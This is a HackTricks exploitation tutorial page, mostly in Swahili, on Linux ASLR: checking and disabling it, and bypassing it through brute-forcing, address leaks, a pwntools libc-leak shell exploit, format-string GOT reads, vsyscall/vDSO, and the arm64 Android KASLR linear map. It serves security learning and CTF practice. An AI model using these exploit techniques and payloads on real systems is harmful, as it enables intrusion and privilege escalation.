ASLR

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa za Msingi

Address Space Layout Randomization (ASLR) ni mbinu ya usalama inayotumika katika mifumo ya uendeshaji ili kufanya anwani za kumbukumbu ziwe za nasibu zinazotumika na michakato ya mfumo na programu. Kwa kufanya hivyo, inafanya iwe vigumu kwa mshambuliaji kutabiri eneo la michakato na data maalum, kama stack, heap, na libraries, hivyo kupunguza aina fulani za exploits, hasa buffer overflows.

Kukagua Hali ya ASLR

Ili kuangalia hali ya ASLR kwenye mfumo wa Linux, unaweza kusoma thamani kutoka kwenye faili /proc/sys/kernel/randomize_va_space. Thamani iliyohifadhiwa kwenye faili hii inaamua aina ya ASLR inayotumika:

• 0: Hakuna nasibu. Kila kitu ni statiki.
• 1: Randomization ya kihafidhina. Shared libraries, stack, mmap(), VDSO page zinapangiwa kwa nasibu.
• 2: Randomization kamili. Mbali na vipengele vinavyopangiwa kwa nasibu kwenye randomization ya kihafidhina, memory inayosimamiwa kupitia brk() inapangiwa kwa nasibu.

Unaweza kuangalia hali ya ASLR kwa amri ifuatayo:

cat /proc/sys/kernel/randomize_va_space

Kuzima ASLR

Ili kuzima ASLR, weka thamani ya /proc/sys/kernel/randomize_va_space kuwa 0. Kuzima ASLR kwa ujumla haishauriwi isipokuwa katika testing au debugging scenarios. Hapa kuna jinsi unavyoweza kuizima:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Unaweza pia kuzima ASLR kwa utekelezaji kwa:

setarch `arch` -R ./bin args
setarch `uname -m` -R ./bin args

Kuwezesha ASLR

Ili kuwezesha ASLR, unaweza kuandika thamani ya 2 kwenye faili ya /proc/sys/kernel/randomize_va_space. Hii kwa kawaida inahitaji root privileges. Kuwezesha randomization kamili kunaweza kufanywa kwa amri ifuatayo:

echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

Uendelevu Baada ya Kuanzisha Upya

Mabadiliko yaliyofanywa kwa amri za echo ni ya muda mfupi na yatarudishwa wakati wa kuanzisha upya. Ili kufanya mabadiliko yawe ya kudumu, unahitaji kuhariri faili /etc/sysctl.conf na kuongeza au kubadilisha mstari ufuatao:

kernel.randomize_va_space=2 # Enable ASLR
# or
kernel.randomize_va_space=0 # Disable ASLR

Baada ya kuhariri /etc/sysctl.conf, tumia amri ifuatayo kutekeleza mabadiliko:

sudo sysctl -p

Hii itahakikisha kwamba mipangilio yako ya ASLR inabaki wakati wa kuanzishwa upya.

Njia za kuepuka

32bit brute-forcing

PaX inagawanya eneo la anuani la mchakato katika 3 groups:

• Code and data (initialized and uninitialized): .text, .data, and .bss —> 16 bits of entropy in the delta_exec variable. Variable hii inayoanzishwa kwa bahati nasibu kila mchakato na inaongezwa kwenye anuani za mwanzo.
• Memory allocated by mmap() and shared libraries —> 16 bits, named delta_mmap.
• The stack —> 24 bits, referred to as delta_stack. Hata hivyo, kwa ufanisi inatumia 11 bits (kutoka byte ya 10 hadi byte ya 20 ikijumuisha), imepangwa kwa 16 bytes —> Hii inasababisha 524,288 possible real stack addresses.

Taarifa hapo juu ni kwa mifumo ya 32-bit na entropy iliyopunguzwa kwa mwisho inafanya iwezekane kuvuka ASLR kwa kurudia kuendesha mara kwa mara hadi exploit itimize kwa mafanikio.

Brute-force ideas:

• Ikiwa una overflow ya kutosha ili kuweka big NOP sled before the shellcode, unaweza tu kujaribu brute-force anuani kwenye stack hadi mtiririko jumps over some part of the NOP sled.
• Chaguo jingine, ikiwa overflow sio kubwa na exploit inaweza kuendeshwa locally, ni add the NOP sled and shellcode in an environment variable.
• Ikiwa exploit ni local, unaweza kujaribu brute-force base address ya libc (inayofaa kwa 32bit systems):

for off in range(0xb7000000, 0xb8000000, 0x1000):

• Ikiwa unashambulia remote server, unaweza kujaribu brute-force the address of the libc function usleep, ukimpatia kama argument 10 (kwa mfano). Ikiwa wakati fulani server inachukua 10s ziada kujibu, umeipata address ya function hii.

Tip

Katika 64bit systems entropy ni kubwa zaidi na hii haipaswi kuwa inawezekana.

64 bits stack brute-forcing

Ni inawezekana kujaza sehemu kubwa ya stack kwa env variables na kisha kujaribu kutumia binary mamia/maelfu ya nyakati locally ili kui-exploit.\
Code ifuatayo inaonyesha jinsi inawezekanavyo kuchagua tu address kwenye stack na kila mamia chache za executions address hiyo itakuwa na NOP instruction:

//clang -o aslr-testing aslr-testing.c -fno-stack-protector -Wno-format-security -no-pie
#include <stdio.h>

int main() {
unsigned long long address = 0xffffff1e7e38;
unsigned int* ptr = (unsigned int*)address;
unsigned int value = *ptr;
printf("The 4 bytes from address 0xffffff1e7e38: 0x%x\n", value);
return 0;
}

</details>

<figure><img src="../../../images/image (1214).png" alt="" width="563"><figcaption></figcaption></figure>

### Habari za Ndani (`/proc/[pid]/stat`)

Faili **`/proc/[pid]/stat`** ya mchakato inaweza kusomwa na kila mtu na **ina taarifa za kuvutia** kama:

- **startcode** & **endcode**: Anwani za juu na za chini zinazohusiana na **TEXT** ya binary
- **startstack**: Anwani ya mwanzo wa **stack**
- **start_data** & **end_data**: Anwani za juu na za chini ambapo **BSS** iko
- **kstkesp** & **kstkeip**: Anwani za sasa za **ESP** na **EIP**
- **arg_start** & **arg_end**: Anwani za juu na za chini ambapo **cli arguments** zipo
- **env_start** &**env_end**: Anwani za juu na za chini ambapo **env variables** zipo

Hivyo, ikiwa mshambuliaji yuko kwenye kompyuta ileile na binary inayoshambuliwa na binary hii haisubiri overflow kutoka kwa raw arguments, bali kutoka kwa **input tofauti inayoweza kutengenezwa baada ya kusoma faili hii**. Inawezekana kwa mshambuliaji **kupata anwani baadhi kutoka kwenye faili hii na kujenga offsets kutoka kwao kwa ajili ya exploit**.

> [!TIP]
> Kwa taarifa zaidi kuhusu faili hii angalia [https://man7.org/linux/man-pages/man5/proc.5.html](https://man7.org/linux/man-pages/man5/proc.5.html) ukitafuta `/proc/pid/stat`

### Kuwa na leak

- **Changamoto inatoa leak**

Ikiwa unapewa leak (changamoto rahisi za CTF), unaweza kuhesabu offsets kutoka kwake (kwa mfano ukijua toleo halisi la libc linalotumika kwenye mfumo unaoshambulia). Mfano huu wa exploit umetolewa kutoka kwa [**example from here**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/aslr-bypass-with-given-leak) (angalia ukurasa huo kwa maelezo zaidi):

<details>
<summary>Python exploit with given libc leak</summary>
```python
from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

p.recvuntil('at: ')
system_leak = int(p.recvline(), 16)

libc.address = system_leak - libc.sym['system']
log.success(f'LIBC base: {hex(libc.address)}')

payload = flat(
'A' * 32,
libc.sym['system'],
0x0,        # return address
next(libc.search(b'/bin/sh'))
)

p.sendline(payload)

p.interactive()

• ret2plt

Kwa kutumia vibaya buffer overflow, inawezekana kutumia ret2plt ili exfiltrate anwani ya function kutoka libc. Angalia:

Ret2plt

• Format Strings Arbitrary Read

Kama inavyotokea katika ret2plt, ikiwa una arbitrary read kupitia format strings vulnerability, inawezekana exfiltrate anwani ya libc function kutoka GOT. The following example is from here:

payload = p32(elf.got['puts'])  # p64() if 64-bit
payload += b'|'
payload += b'%3$s'              # The third parameter points at the start of the buffer

# this part is only relevant if you need to call the main function again

payload = payload.ljust(40, b'A')   # 40 is the offset until you're overwriting the instruction pointer
payload += p32(elf.symbols['main'])

Unaweza kupata taarifa zaidi kuhusu Format Strings arbitrary read katika:

Format Strings

Ret2ret & Ret2pop

Jaribu kupitisha ASLR kwa kutumia anwani ndani ya stack:

Ret2ret & Reo2pop

vsyscall

Mekanismi ya vsyscall inalenga kuboresha performance kwa kuruhusu certain system calls zifanyike ndani ya user space, ingawa kwa kimsingi ni sehemu ya kernel. Faida kuu ya vsyscalls iko katika fixed addresses zao, ambazo hazitegemei ASLR (Address Space Layout Randomization). Asili hii ya fixed ina maana kwamba attackers hawahitaji information leak vulnerability ili kubaini anwani zao na kuziweza kutumia katika exploit.
Hata hivyo, haitawezekana kupata super interesting gadgets hapa (ingawa kwa mfano inawezekana kupata ret; equivalent)

(Mfano na code ifuatayo ni from this writeup)

Kwa mfano, attacker anaweza kutumia address 0xffffffffff600800 ndani ya exploit. Kuangalia kuruka moja kwa moja kwenda kwenye maelekezo ya ret kunaweza kusababisha kutokuwa na stabili au crashes baada ya kutekeleza baadhi ya gadgets, lakini kuruka kwenye mwanzo wa syscall iliyotolewa na sehemu ya vsyscall kunaweza kufanikiwa. Kwa kuweka kwa umakini ROP gadget itakayosababisha execution kwenda kwenye address hii ya vsyscall, attacker anaweza kupata code execution bila kuhitaji kupitisha ASLR kwa sehemu hii ya exploit.

 0xffffffffff601000 0x0000000000000000 r-x [vsyscall]
A syntax error in expression, near `.g 
 0xffffffffff601000 0x0000000000000000 r-x [vsyscall]'.
gef➤  x/8g 0xffffffffff600000
0xffffffffff600000:    0xf00000060c0c748    0xccccccccccccc305
0xffffffffff600010:    0xcccccccccccccccc    0xcccccccccccccccc
0xffffffffff600020:    0xcccccccccccccccc    0xcccccccccccccccc
0xffffffffff600030:    0xcccccccccccccccc    0xcccccccccccccccc
gef➤  x/4i 0xffffffffff600800
0xffffffffff600800:    mov    rax,0x135
0xffffffffff600807:    syscall
0xffffffffff600809:    ret
0xffffffffff60080a:    int3
gef➤  x/4i 0xffffffffff600800
0xffffffffff600800:    mov    rax,0x135
0xffffffffff600807:    syscall
0xffffffffff600809:    ret
0xffffffffff60080a:    int3
```

vDSO
Kumbuka hivyo jinsi inaweza kuwa inawezekana bypass ASLR abusing the vdso ikiwa kernel imekompyuliwa na CONFIG_COMPAT_VDSO kwani anwani ya vdso haitararushwa. Kwa taarifa zaidi angalia:
Ret2vDSO
KASLR on ARM64 (Android): bypass via fixed linear map
Katika kernels nyingi za arm64 Android, base ya kernel linear map (direct map) imewekwa sawa across boots. Kernel VAs kwa physical pages zinakuwa za kutabirika, kuvunja KASLR kwa targets zinazoweza kufikiwa kupitia direct map.

For CONFIG_ARM64_VA_BITS=39 (4 KiB pages, 3-level paging):
PAGE_OFFSET = 0xffffff8000000000
PHYS_OFFSET = memstart_addr (exported symbol)
Translation: virt = ((phys - PHYS_OFFSET) | PAGE_OFFSET)

Leaking PHYS_OFFSET (rooted or with a kernel read primitive)

grep memstart /proc/kallsyms to find memstart_addr
Soma 8 bytes kwa anwani hiyo (LE) ukitumia kernel read yoyote (mf., tracing-BPF helper calling BPF_FUNC_probe_read_kernel)
Hesabu direct-map VAs: virt = ((phys - PHYS_OFFSET) | 0xffffff8000000000)

Exploitation impact

No separate KASLR leak needed if the target is in/reachable via the direct map (e.g., page tables, kernel objects on physical pages you can influence/observe).
Inarahisisha reliable arbitrary R/W na kupigia lengo kernel data kwenye arm64 Android.

Reproduction summary

grep memstart /proc/kallsyms -> address of memstart_addr
Kernel read -> decode 8 bytes LE -> PHYS_OFFSET
Use virt = ((phys - PHYS_OFFSET) | PAGE_OFFSET) with PAGE_OFFSET=0xffffff8000000000


Note
Access to tracing-BPF helpers requires sufficient privileges; any kernel read primitive or info leak suffices to obtain PHYS_OFFSET.

How it’s fixed

Limited kernel VA space plus CONFIG_MEMORY_HOTPLUG reserves VA for future hotplug, pushing the linear map to the lowest VA (fixed base).
Upstream arm64 removed linear-map randomization (commit 1db780bafa4c).


References

Defeating KASLR by Doing Nothing at All (Project Zero)
arm64: remove linear map randomization (commit 1db780bafa4c)
Tracing BPF arbitrary read helper (Project Zero issue 434208461)


Tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.